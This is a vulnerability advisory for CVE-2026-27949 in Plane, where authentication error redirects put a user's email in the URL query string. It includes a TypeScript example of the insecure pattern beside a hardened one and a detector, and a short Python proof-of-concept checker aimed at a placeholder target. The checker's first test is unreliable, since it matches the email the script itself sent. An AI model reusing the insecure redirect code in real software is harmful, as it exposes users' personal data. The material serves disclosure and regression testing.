Security Vulnerability Report

CVE-2026-27949

Published: 2026-04-07 21:17:15
Last Modified: 2026-04-14 18:44:46

Description

Plane is an open-source project management tool. Prior to 1.3.0, a vulnerability was identified in Plane's authentication flow where a user's email address is included as a query parameter in the URL during error handling (e.g., when an invalid magic code is submitted). Transmitting personally identifiable information (PII) via GET request query strings is classified as an insecure design practice (CWE-598), because query strings are recorded in server and proxy access logs, browser history and Referer headers. The affected code path is located in the authentication utility module (packages/utils/src/auth.ts). This vulnerability is fixed in 1.3.0.
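The weak pattern the advisory describes, shown next to a hardened form, as an added example written for this report; it is not Plane's code and does not reproduce packages/utils/src/auth.ts. TypeScript is used because the affected module is TypeScript. The function names, the /auth/sign-in path and the error-code values are hypothetical; queryLeaksPii is the kind of check a test suite can run over every redirect target an auth flow can produce.

```typescript
// Added example, not Plane's code. All names and paths below are hypothetical.

const EMAIL_RE = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

// Weak pattern (CWE-598): the submitted email travels back to the browser in
// the query string of the error redirect, so it lands in server access logs,
// proxy logs, browser history and outbound Referer headers.
function buildErrorRedirectInsecure(base: string, errorCode: string, email: string): string {
  const url = new URL("/auth/sign-in", base);
  url.searchParams.set("error_code", errorCode);
  url.searchParams.set("email", email);
  return url.toString();
}

// Hardened form: only an opaque error code goes into the URL. The address the
// user typed stays in client-side form state or a server-side session, never
// in a GET query string.
function buildErrorRedirectSafe(base: string, errorCode: string): string {
  const url = new URL("/auth/sign-in", base);
  url.searchParams.set("error_code", errorCode);
  return url.toString();
}

// Defensive check: returns the names of query parameters whose value looks
// like an email address. An empty array means no email-shaped PII in the URL.
function queryLeaksPii(target: string): string[] {
  const url = new URL(target);
  const leaked: string[] = [];
  url.searchParams.forEach((value, key) => {
    if (EMAIL_RE.test(value)) {
      leaked.push(key);
    }
  });
  return leaked;
}

// Constructed sample input: a hypothetical instance and a made-up address.
const base = "https://plane.example";
const weak = buildErrorRedirectInsecure(base, "INVALID_MAGIC_CODE", "user@example.com");
const safe = buildErrorRedirectSafe(base, "INVALID_MAGIC_CODE");
console.log("weak redirect leaks:", queryLeaksPii(weak)); // ["email"]
console.log("safe redirect leaks:", queryLeaksPii(safe)); // []
```

Running queryLeaksPii over the redirect targets an auth utility builds turns the advisory's finding into a regression test: the insecure builder fails it, the hardened one passes.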

CVSS Details

CVSS Score
2.0
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N

The score above is the GitHub (secondary) assessment. The raw JSON below also carries NVD's primary assessment of 4.3 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N), which assumes no privileges are required.

Configurations (Affected Products)

cpe:2.3:a:plane:plane:*:*:*:*:*:*:*:* - VULNERABLE
Plane < 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-27949: Information Disclosure via Query Parameter
import requests


def check_poc(target_url, email):
    # Simulating the vulnerable endpoint where email is passed in URL
    # during an error scenario (e.g. invalid magic code)
    params = {
        "email": email,
        "code": "INVALID_CODE",
    }
    try:
        response = requests.get(target_url, params=params, allow_redirects=False)
    except requests.RequestException as exc:
        # Network or TLS failure: nothing can be concluded about the target
        print(f"[!] Request failed: {exc}")
        return False

    # Check if the email is present in the URL (Location header or response URL).
    # Note: response.url echoes the query string this script itself sent, so a
    # match there only mirrors the request; the Location header is the check
    # that shows the server placing the email into a URL.
    if email in response.url:
        print(f"[+] Vulnerability Confirmed: Email leaked in URL -> {response.url}")
        return True
    if "Location" in response.headers and email in response.headers["Location"]:
        print(f"[+] Vulnerability Confirmed: Email leaked in Redirect Location -> {response.headers['Location']}")
        return True
    print("[-] Vulnerability not detected in this specific request.")
    return False


if __name__ == "__main__":
    target = "https://target-plane-instance.com/auth/verify-magic-code"
    user_email = "[email protected]"
    check_poc(target, user_email)

References

https://github.com/makeplane/plane/security/advisories/GHSA-8rvg-7w43-p2w2 (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27949", "sourceIdentifier": "[email protected]", "published": "2026-04-07T21:17:15.400", "lastModified": "2026-04-14T18:44:46.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plane is an an open-source project management tool. Prior to 1.3.0, a vulnerability was identified in Plane's authentication flow where a user's email address is included as a query parameter in the URL during error handling (e.g., when an invalid magic code is submitted). Transmitting personally identifiable information (PII) via GET request query strings is classified as an insecure design practice. The affected code path is located in the authentication utility module (packages/utils/src/auth.ts). This vulnerability is fixed in 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-598"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:plane:plane:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "A83B3D5C-1D3E-422F-BDE7-557F3EB8F934"}]}]}], "references": [{"url": "https://github.com/makeplane/plane/security/advisories/GHSA-8rvg-7w43-p2w2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}